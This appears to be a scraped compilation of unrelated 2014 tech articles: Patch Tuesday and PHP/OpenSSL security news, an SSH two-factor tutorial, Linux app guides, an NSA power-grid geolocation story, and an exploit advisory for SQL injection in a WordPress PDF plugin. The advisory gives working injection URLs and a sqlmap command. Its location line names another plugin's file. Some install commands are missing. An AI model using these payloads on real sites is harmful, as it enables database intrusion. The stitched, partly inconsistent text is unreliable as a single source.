Microsoft has released patches for 29 security vulnerabilities, while Adobe has released an update for Flash Player. Redmond's latest Patch Tuesday batch is composed of six bulletins, two of which have been rated as critical updates. Three others have been rated important, and the sixth is considered a moderate risk.
The critical bug fixes include:
  • Cumulative security update for Internet Explorer (2975687) Addressing 24 memory-corruption vulnerabilities, including remote-code execution flaws, in IE 6 to 11 on supported OS versions. The same holes in Windows Server editions are rated as moderate. Server 2008 for 32-bit Systems Service Pack 2, x64-based Systems Service Pack 2 and R2 for x64-based Systems Service Pack 1 are not affected, and neither are Server 2012 and 2012 R2. Some of the holes were revealed in this year's Pwn2Own hacking contest. None have otherwise been exploited in the wild.
  • Vulnerability in Windows Journal could allow remote-code execution (2975689) Addressing a remote-code execution flaw in the note-taking application, which could be exploited by specially crafted Journal files to hijack the system as the logged-in user. This affects Windows Vista, Server 2008, 7, Server 2008 R2, 8 and 8.1, Server 2012 and Server 2012 R2, and Windows RT and RT 8.1.
The three important bulletins, and one moderate, address elevation of privilege and denial of service vulnerabilities.
There is also updated firmware for all Microsoft Surface tablets: an upgrade labeled "System Firmware Update – 7/8/2014" should be available via Windows Update, and improves various hardware-related things such as battery management and Miracast wireless display support.
Adobe, meanwhile, has updated Flash Player for Windows, OS X and Linux systems. The company said that the fix will address three CVE-listed bugs, including a remote-code execution flaw on Flash Player for both Internet Explorer and Chrome.
The fix is rated by Adobe as a top deployment priority on Windows, OS X and Linux. Google Chrome users will automatically receive the update upon launching the browser. Adobe is also patching the flaws in its AIR platform, though that fix is rated by the company as a lower priority.


With many high-profile password leaks nowadays, there is a lot of buzz in the industry on "multi-factor" authentication. In a multi-factor authentication system, users are required to go through two distinct authentication procedures: providing something they know (e.g., username/password), and leveraging something they have "physical" access to (e.g., one-time passcode generated by their mobile phone). This scheme is also commonly known as two-factor authentication or two-step verification.
To encourage the wide adoption of two-factor authentication, Google released Google Authenticator, an open-source application that can generate one-time passcodes based on open standards (e.g., HMAC/time-based). It is available on multiple platforms including Linux, Android and iOS. Google also offers a pluggable authentication module (PAM) for Google Authenticator, allowing it to be integrated with other PAM-enabled applications such as OpenSSH.
In this tutorial, I will describe how to set up two-factor authentication for an SSH server by integrating Google Authenticator with OpenSSH. I am going to use an Android device to generate one-time passcodes. In this tutorial, you will need two things: (1) a Linux host where OpenSSH server is running, and (2) an Android device.

Install Google Authenticator on Linux

The first step is to install Google Authenticator on the Linux host where OpenSSH server is running. Follow this guide to install Google Authenticator and its PAM module on your system.
Once Google Authenticator is ready, you need to go through one-time configuration which involves creating an authentication key from this Linux host, and registering it with an Android device. This will be explained next.

Generate an Authentication Key

To start, simply run Google Authenticator on the Linux server host.
$ google-authenticator
You will see a QR code, as well as a secret key underneath it. The displayed QR code simply represents the numeric secret key. You will need either one to finalize configuration with an Android device.
Google Authenticator will ask you several questions. If you are not sure, you can answer "Yes" to all questions. The emergency scratch codes can be used to regain access to the SSH server in case you lose your Android device and so cannot generate one-time passcodes. So it's better to write them down somewhere.

Run Google Authenticator on Android

As we are going to use an Android device for two-factor authentication, you will need to install Google Authenticator app on Android. Go to Google Play to install it on Android.
When you start Google Authenticator on Android, you will see the following configuration menu.
You can choose either "Scan a barcode" or "Enter provided key" option. The first option allows you to enter the security key, simply by scanning the generated QR code. In this case, you will need to install Barcode Scanner app first. If you choose the second option, you can type the security key using Android keyboard as follows.
Once you register a secret key either way, you will see the following screen on Android.

Enable Google Authenticator on SSH Server

The final step is to integrate Google Authenticator with OpenSSH server. For that, you need to edit two files.
First, edit a PAM configuration file, and append the line below.
$ sudo vi /etc/pam.d/sshd
auth required pam_google_authenticator.so
Then open an SSH server config file, search for ChallengeResponseAuthentication, and enable it.
$ sudo vi /etc/ssh/sshd_config
ChallengeResponseAuthentication yes
Finally, restart SSH server.
On Ubuntu, Debian or Linux Mint:
$ sudo service ssh restart
On Fedora:
$ sudo systemctl restart sshd
On CentOS or RHEL:
$ sudo service sshd restart

Test Two-factor Authentication

Here is how you use two-factor authentication for SSH logins.
Run the Google Authenticator app on Android to obtain a one-time verification code. Once generated, a given passcode is valid for 30 seconds. Once it expires, Google Authenticator will automatically generate a new one.
Now log in to the SSH server as you normally do.
$ ssh user@ssh_server
When you are asked to enter "Verification code", type in the verification code generated by Android. After successful verification, you can then type in your SSH login password.
To conclude, two-factor authentication can be an effective means to secure password authentication by adding an extra layer of protection. You can use Google Authenticator to secure other logins such as Google account, WordPress.com, Dropbox.com, Outlook.com, etc. Whether you decide to use it or not, it's up to you, but there is a clear industry trend towards the adoption of two-factor authentication.



######################
# Exploit Title : Wordpress BSK PDF Manager 1.3.2 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/

# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip

# Date : 2014-07-04

# Tested on : Windows 7 / Mozilla Firefox
#     Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :  
http://localhost/wp-content/plugins/compfight/compfight-search.php

######################

# Vulnerable code :

[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $categories_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['categoryid']) && $_GET['categoryid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $category_id = trim($_GET['categoryid']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:             if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     $lists_curr_view = trim($_GET['view']);
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                     if(isset($_GET['pdfid']) && $_GET['pdfid']){
bsk-pdf-manager/inc/bsk-pdf-dashboard.php:                             $pdf_id = trim($_GET['pdfid']);


$category_id = trim($_GET['categoryid']);
$pdf_id = trim($_GET['pdfid']);

######################

Exploit Code via Browser:

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2

http://127.0.0.1/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2

Exploit Code via sqlmap:

sqlmap --cookie='INSERT_WORDPRESS_COOKIE_HERE' -u "http://10.0.0.67/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1" -p categoryid

#####################

Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it

#####################
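
The `trim($_GET['categoryid'])` pattern from the grep output next to a hardened form, as an added example (not the plugin's code and not part of the original advisory). It assumes the value reaches the SQL statement unquoted, which is what the `1 and 1=2` check above relies on; the `pdf_category` table and the function names are hypothetical, and SQLite stands in for the WordPress database.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the plugin's category table (hypothetical schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pdf_category (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pdf_category VALUES (?, ?)",
                     [(1, "Manuals"), (2, "Invoices")])
    return conn


def category_concatenated(conn, raw_categoryid):
    """The pattern from the advisory: trim the request value, then splice it in."""
    category_id = raw_categoryid.strip()
    # The request value becomes part of the SQL text, so it can change the
    # WHERE clause instead of only supplying an id.
    sql = "SELECT id, title FROM pdf_category WHERE id = " + category_id
    return conn.execute(sql).fetchone()


def category_hardened(conn, raw_categoryid):
    """Reject anything that is not a plain integer, then bind it as a parameter."""
    category_id = raw_categoryid.strip()
    if not (category_id.isascii() and category_id.isdigit()):
        raise ValueError("categoryid must be an integer")
    # The value travels separately from the SQL text and cannot alter it.
    return conn.execute("SELECT id, title FROM pdf_category WHERE id = ?",
                        (int(category_id),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1 and 1=2"):       # constructed request values
        print(repr(value), "->", category_concatenated(db, value))
        try:
            print(repr(value), "->", category_hardened(db, value))
        except ValueError as err:
            print(repr(value), "-> rejected:", err)
```

In WordPress itself the equivalent controls are `absint()` on the request value and `$wpdb->prepare()` for the query.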





Voice Commands allows you to perform some main actions by voice. It offers this facility in 67 languages, and at this moment 95 voice commands are available. It allows users to use their own voice to enhance their overall Linux experience. The program works by running the play_stop.sh script, which starts recording your voice; after five seconds, or when the script is run again, voice recognition starts and, for now, one of the available commands is carried out.



>> Available for Ubuntu 14.04 Trusty/14.10/13.10 Saucy/12.04 Precise/10.04 Lucid/Linux Mint 17/16/13/9/other Ubuntu derivatives
To install Voice Commands (English Version) in Ubuntu/Linux Mint open Terminal (Press Ctrl+Alt+T) and copy the following commands in the Terminal:






In my test the commands file was missing; if you get the same problem, then proceed with these commands:







You can open Voice Command from Dash/Menu or use terminal to issue voice commands:
>> v-c command line options

v-c -l -lang    To select another, of 67 languages for recognition.
v-c -t -try     To try any command, of default lang, or, a [-lang].
v-c -m -mod     To modify the commands file, and the README file.
v-c -h          Show instructions README file.
v-c --help      Show this message

You can download other languages from this page.

Voice Actions Available:

  1. SELECT_FILE << cited-text >> (select)
  2. MUSIC_START (put music | music play | music player | music | pause)
  3. MUSIC_START_SONG << cited-text >> (put music of | music of | play to | play music of)
  4. MUSIC_PLAY (play music | pause music | start music | stop music | stop music)
  5. MUSIC_NEXT (next song | next track)
  6. MUSIC_PREV (previous song | previous track)
  7. MUSIC_SHUFFLE (random music | mix | do not mix)
  8. MUSIC_REPEAT (repeat | not repeat)
  9. VIDEO_REW (delay | rewind | go back)
  10. VIDEO_FF (forward | go forward)
  11. VOLUME_DOWN (lower the volume | volume down | less volume | volume less)
  12. VOLUME_UP (increase the volume | volume up | more volume | volume more)
  13. VOLUME_MUTE (no audio | no volume | turn off audio | dumb)
  14. SEARCH << cited-text >> (search)
  15. NO_RESALT (remove highlighting | remove highlighted | no highlighting | no highlighted)
  16. TRANSLATE [from] [to] << cited-text >> (translate | translates the | translation | translates of | translate from | translated from | translation from | dictionary of the | translates the | translation of the)
  17. WRITE << cited-text >> (write | type)
  18. WRITE_CAPITAL << cited-text >> (capitalize | type capital)
  19. WRITE_CAPITAL_ALL << cited-text >> (write all uppercase | write everything capitalized)
  20. SAY_THIS << cited-text >> (say this | say)
  21. GOOGLE_SEARCH << cited-text >> (search google | internet search | meaning of | what is | search the dictionary)
  22. YOUTUBE_SEARCH << cited-text >> (search on youtube | what about | search videos | videos )
  23. WIKI_SEARCH << cited-text >> (search wiki | search wikipedia | wikipedia)
  24. WEATHER << cited-text >> (weather | climate)
  25. SEARCH_MAPS << cited-text >> (map | map search | map of | map from | where is)
  26. SAY_HI << cited-text >> (greets to | say hi to)
  27. HELLO (hello machine)
  28. WHOAMI (who i am)
  29. OPEN_FOLDER << cited-text >> (open folder)
  30. OPEN_FOLDER_OF << cited-text >> (open folder of)
  31. SAY_TIME (tell me the hour | what the time is | what time is it)
  32. SAY_DATE (date is | which day is | that date today | which day is today | tell me the date | on what date we are)
  33. DICTATION << cited-text-continuously >> (dictation mode | out dictation mode | end dictation mode)
  34. UNDO (undo)
  35. REDO (redo)
  36. DEL_LINE (delete line)
  37. FAV (add to favorite)
  38. CLOSE_TERM (close the terminal | close terminal)
  39. MAIL (open mail | open email | open mail | mail | email)
  40. COPY (copy)
  41. PASTE (paste)
  42. CUT (cut)
  43. SELECT_ALL (select all)
  44. SAVE (save | save file)
  45. SAVE_AS (save as | save page as)
  46. FOLDER (create folder | new folder)
  47. MINIMISE (minimize)
  48. MAXIMISE (maximize)
  49. FULLSCREEN (full screen | fullscreen)
  50. TAB (key tab | tabulation | tab)
  51. ESC (escape)
  52. MENU (main menu | open main menu)
  53. ACTIONS_MENU (menu | open menu | close menu)
  54. CLOSE (close program | exit)
  55. CLOSE_WIN (close window)
  56. ZOOM_OUT (ward | shrink | decrease | zoom less)
  57. ZOOM_IN (approximate | enlarge | raise | zoom more)
  58. ZOOM_RESET (normal size | zero zoom)
  59. TOUCH_ON_OFF (turn off touchpad | turn on touchpad | touchpad)
  60. BACK (over | back)
  61. ADVANCE (move | forward)
  62. RIGHT (right)
  63. LEFT (left)
  64. DOWN (down)
  65. UP (go up)
  66. PAGE_DOWN (page down)
  67. PAGE_UP (page up)
  68. HOME_PAGE (top of page | go to top of page | go to the top)
  69. END_PAGE (end of page | go to end of page | go to the end)
  70. HOME (top of)
  71. END (the end)
  72. SCROLL_DOWN (run page down | run down)
  73. SCROLL_UP (run page up | run up)
  74. DELETE (delete)
  75. ENTER (open | execute | enter)
  76. NEW_WINDOW (new window)
  77. CHANGE_TAB (window move | go to window | switch to window | window | move tab | go to tab | switch to tab)
  78. CLOSE_TAB (close tab)
  79. BROWSER (browser | open browser | internet)
  80. FILE_MANAGER (nautilus | file explorer | open nautilus | open file explorer)
  81. TERMINAL (open the console | open terminal | terminal opens | open the terminal)
  82. EXECUTE (launch command | run command)
  83. BATTERY (battery | battery status | battery charge)
  84. TEXT_EDITOR (text editor | open text editor | launch text editor | new text)
  85. SCREENSHOT (screenshot | catch)
  86. ALARM << cited-numbers [days] [hours] [minutes] [seconds]>> (alarm | start alarm at)
  87. LOG_OFF (logout | system logout)
  88. BRIGHTNESS_UP (raise the brightness | brighten up | shine up | up brightness | increase brightness)
  89. BRIGHTNESS_DOWN (lower the brightness | decrease brightness | brightness down | shine down | decrease brightness)
  90. POWER_OFF (shut down the system | turn off the machine | turn off the computer | turn off computer | power off)
  91. CALCULATER (calculator)
  92. TAKE_PICTURE (photo | take a picture)
  93. TAKE_VIDEO (record | record video | record a video)
  94. OPEN_FILE (open file | open a new file)
  95. OFFICE << cited-text [ writer, calc, impress, draw, math ] >> (open new document | open new document of | create new document | create new document of | create new | open new) Writer (text) Calc (calc) Impress (presentation | page | web) Draw (drawing | graphic) Math (formula | math)
  96. RETRY (retry command | repeat command | try again the command | retry | try again)


The PHP Group has released new versions of the popular scripting language that fix a number of bugs, including two in OpenSSL. The flaws fixed in OpenSSL don’t rise to the level of the major bugs such as Heartbleed that have popped up in the last few months. But PHP 5.5.14 and 5.4.30 both contain fixes for the two vulnerabilities, one of which is related to the way that OpenSSL handles timestamps on some certificates, and the other of which also involves timestamps, but in a different way.
“This piece of code is the part of a backwards UTCTime parser. It moves 2 positions to the left, and converts those two characters to an int,” the bug report for one of the OpenSSL flaws says.
“However, certs with a validity past 2050 contain GeneralizedTime formatted timestamps allowing 4 characters in the year field instead of the UTCTime this function parses (badly).”
The second OpenSSL vulnerability lies in the way that PHP handles certain data types for timestamps. A specially crafted certificate can cause errors.
“The cert was generated by a Windows 2003 server. Note the “valid to” time is “Jun 21 15:59:11 2109 GMT”. In openssl.c PHP checks for V_ASN1_UTCTIME, but triggers the warning when the time is V_ASN1_GENERALIZEDTIME. According to a brief search of the openssl source both are valid expressions of a valid from/to time,” the report says.
Along with the two OpenSSL vulnerabilities fixed in PHP 5.5.14 and 5.4.30, there are a number of other bugs fixed in the releases, many of which are not security related.
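
The two timestamp encodings named in the bug reports, as an added example (not PHP's or OpenSSL's code): a parser for X.509 validity times that dispatches on the ASN.1 tag, applies the RFC 5280 two-digit-year rule to UTCTime, and reads four-digit years from GeneralizedTime. The sample value is constructed from the "Jun 21 15:59:11 2109 GMT" date quoted above, and `read_as_utctime_without_checks` is a hypothetical helper showing what a reader that ignores the tag would make of the same bytes.

```python
from datetime import datetime, timezone

V_ASN1_UTCTIME = 23          # universal tag 0x17: YYMMDDHHMMSSZ
V_ASN1_GENERALIZEDTIME = 24  # universal tag 0x18: YYYYMMDDHHMMSSZ

# Constructed sample: the "valid to" date from the quoted report, encoded as
# GeneralizedTime because it lies past 2049.
SAMPLE_NOT_AFTER = "21090621155911Z"


def parse_asn1_time(tag, value):
    """Parse an X.509 validity time (UTC, seconds present) into a datetime."""
    if tag == V_ASN1_UTCTIME:
        year_digits, expected_len = 2, 13
    elif tag == V_ASN1_GENERALIZEDTIME:
        year_digits, expected_len = 4, 15
    else:
        raise ValueError("not a time type: tag %r" % tag)
    if len(value) != expected_len or not value.endswith("Z"):
        raise ValueError("wrong length or missing Z for tag %d" % tag)
    digits = value[:-1]
    if not (digits.isascii() and digits.isdigit()):
        raise ValueError("non-digit characters in time value")
    year = int(digits[:year_digits])
    if year_digits == 2:
        # RFC 5280: YY >= 50 means 19YY, otherwise 20YY.
        year += 1900 if year >= 50 else 2000
    rest = digits[year_digits:]
    month, day, hour, minute, second = (
        int(rest[i:i + 2]) for i in range(0, 10, 2))
    # datetime() raises ValueError for out-of-range fields such as month 13.
    return datetime(year, month, day, hour, minute, second, tzinfo=timezone.utc)


def read_as_utctime_without_checks(value):
    """Hypothetical tag-blind reader: treats the first 12 digits as UTCTime."""
    return parse_asn1_time(V_ASN1_UTCTIME, value[:12] + "Z")


if __name__ == "__main__":
    print("correct:  ", parse_asn1_time(V_ASN1_GENERALIZEDTIME, SAMPLE_NOT_AFTER))
    print("tag-blind:", read_as_utctime_without_checks(SAMPLE_NOT_AFTER))
```

Read without regard to its tag, the 2109 expiry silently becomes a date in 2021, which is why the tag and length checks come before any digit is converted.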



Wanted to watch TV on your Linux box, and preferably for free? FreetuxTV is an online TV player which was originally developed to let the subscribers of French ISPs (e.g., Free, Orange, SFR) watch live TV channels streamed by those ISPs. Over time, FreetuxTV has added additional free online TV, web radio and webcam channels to the list, and now the (crowdsourced) FreetuxTV database carries channels in over 50 different languages.
While FreetuxTV channels are not premium quality by any means (and for good reason), it can still be a good option especially for expats who typically don't have the luxury to watch live TV programs or radio of their home countries. In this tutorial, I am going to describe how to watch free online TV on Linux using FreetuxTV.

Install FreetuxTV on Linux

First, you need to install VLC as FreetuxTV uses VLC backend to play TV or radio channels. Refer to this tutorial to install VLC on your Linux system.
After that, follow the distro-specific guidelines below to compile and install FreetuxTV. The latest FreetuxTV is built with GTK3-based GUI.
To install FreetuxTV on Debian, Ubuntu or Linux Mint:
$ wget https://freetuxtv.googlecode.com/files/freetuxtv-0.6.6.tar.gz
$ tar xvfvz freetuxtv-0.6.6.tar.gz
$ sudo apt-get install gcc make autoconf automake intltool libtool gettext libgtk-3-dev libdbus-glib-1-dev libsqlite3-0 libsqlite3-dev libcurl3 libcurl4-openssl-dev libvlc-dev libnotify-dev
$ cd freetuxtv-0.6.6
$ ./autogen.sh
$ ./configure --prefix=/usr/local
$ make
$ sudo make install
To install FreetuxTV on Fedora:
$ wget https://freetuxtv.googlecode.com/files/freetuxtv-0.6.6.tar.gz
$ tar xvfvz freetuxtv-0.6.6.tar.gz
$ sudo yum install vlc-devel dbus-glib-devel libnotify-devel libcurl-devel intltool gtk3-devel sqlite-devel
$ cd freetuxtv-0.6.6
$ ./autogen.sh
$ ./configure --prefix=/usr/local
$ make
$ sudo make install

Watch Online TV with FreetuxTV

To launch FreetuxTV, simply run the command:
$ freetuxtv
The first time you run FreetuxTV, you will be asked to add channel group(s) you are interested in. The channels are categorized by languages.
Once you add one or more channel groups, it will appear in the left sidebar of FreetuxTV.
To watch a TV channel, simply click on the corresponding icon.

Record Live TV with FreetuxTV

Since live broadcasting has varying time schedules across different countries in different timezones, FreetuxTV is also designed to allow you to record live TV or radio at scheduled time slots, so you can enjoy them later at your convenience.
To record the current channel, click on the record icon at the bottom. It will pop up a window where you can set the recording period.
Once you start recording, you can check the status of recording by clicking on "Recordings" tab on the left.
You can choose among different transcoding formats in the Preferences window.



Forensics and industry experts have cast doubt on an alleged National Security Agency capability to locate whistle blowers appearing in televised interviews based on how the captured background hum of electrical devices affects energy grids.
Divining information from electrified wires is a known technique: Electrical Network Frequency (ENF) analysis is used to prove video and audio streams have not been tampered with.
The technique works by analysing the nearly inaudible 50 Hertz energy hum generated by power grids which is inadvertently captured by most audio recording devices. Investigators could strip away layers of audio until the bare hum remains. That hum can then be scrutinised for unnatural variations.
ENF analysis became topical this week when German outlet Heute.de reported an un-named former NSA staffer claimed the agency has used it to determine the physical location where a recording of TV interviews took place by matching captured energy hums with those previously recorded across the grid.
NSA operatives could therefore guess at a whistleblower's location.
Technology to conduct ENF is not exotic. Bandpass filters can detect variations in the 50Hz hum which would detect dips and rises as small as 0.001 Hz over 10 seconds.
That it is possible to geolocate variations in grid hum, which Heute.de reports the NSA and CIA can do, is more novel.
But experts are dubious the reports are correct.
"Let me start by saying that in principle it could well be possible to use ENF to determine the location a recording was made as well as the time it was made," Philip Harrison, an ENF forensics veteran of 18 years based in London told The Register.
"It's possible that there are some other aspects of the signal that vary by location that haven't been discovered yet, or perhaps the NSA have discovered them."
Harrison had performed ENF analysis to verify an audio recording presented as evidence in court, showing that an undercover police recording of an illegal weapons deal had not been tampered with. In 2010, ENF was used in a high profile murder case in the UK. Blighty's Metropolitan Police Service have stockpiled a comprehensive database of electrical grid frequencies since 2005 to help with further cases.
Vulture South contacted Harrison and others about the ex-NSA agent's claims. Harrison saw three problems that were likely intractable for anyone other than the seemingly superhuman hackers at the NSA.
"Firstly," Harrison said, "the NSA would need to know over what geographic area the specific type of variation occurred".
Research published last month by the University of Porto, Portugal, (Real-Time Monitoring of ENF and THD Quality Parameters of the Electrical Grid in Portugal) examined local variation in the nation's power grid. It found fundamental differences in the structure of the harmonics of the 50 Hz which could be detected because Total Harmonic Distortion was strongly affected by local factors and had as a result little geographical consistency.
That research considered only a handful of locations meaning it was unclear how the features could vary between sub-stations or power stations, Harrison said. The NSA could know of other signal aspects that varied according to location, but that was speculative.
The second problem was the need to log ENF values and the secret signal sauce that allowed location to be determined. "This could mean hundreds or thousands of logging devices in a country if you want to be able to locate a recording accurately," he said.
The problem was a prodigious one because of the huge amount of frequency variation in local power grids. All manner of electrical devices could cause a dip or spike in neighbouring networks.
"You would need a tap on every one of thousands of transformers," said Ian Appleby, a former veteran of the Australian energy and defence sectors who maintained a comprehensive knowledge of electronics, but not of ENF. "In the industrial area where I used to be, my UPS (uninterruptible power supply) would freak out when nearby commercial places shut down causing a spike in frequency."
He doubted the feasibility of mapping a whole power grid considering these immense variables.
A third problem relates to the hit and miss process of extracting the relevant data from captured recordings.
"From my experience of casework this is the hardest part," Harrison said. "It's not always easy to get out the variation in 50 Hz since it is at such a low level in the signal, let alone trying to get more information out about the harmonics or some other aspect of the signal."
"So while it might be able to work in principle, actually applying it to a real-world recording could be a lot harder."
The audio and video equipment used to record whistle blowers could be identified, according to NSW-based Brian Stokes who had a background in the field but not ENF. He and other engineers agreed with Appleby's remarks.
"The possibilities of characterising the recording equipment such as microphone, input amplifier, etcetera are rather good, but the likelihood of determining the geographical location of the recording based upon artifacts of the mains supply, given the levels of filtration in DC supply design, sounds improbable."
If the NSA did have the technology, it was bad news for whistleblowers. The Heute.de source said they could nail a whistle blower in less than three weeks, even faster if they spoke at a monitored journalist's favourite haunt.


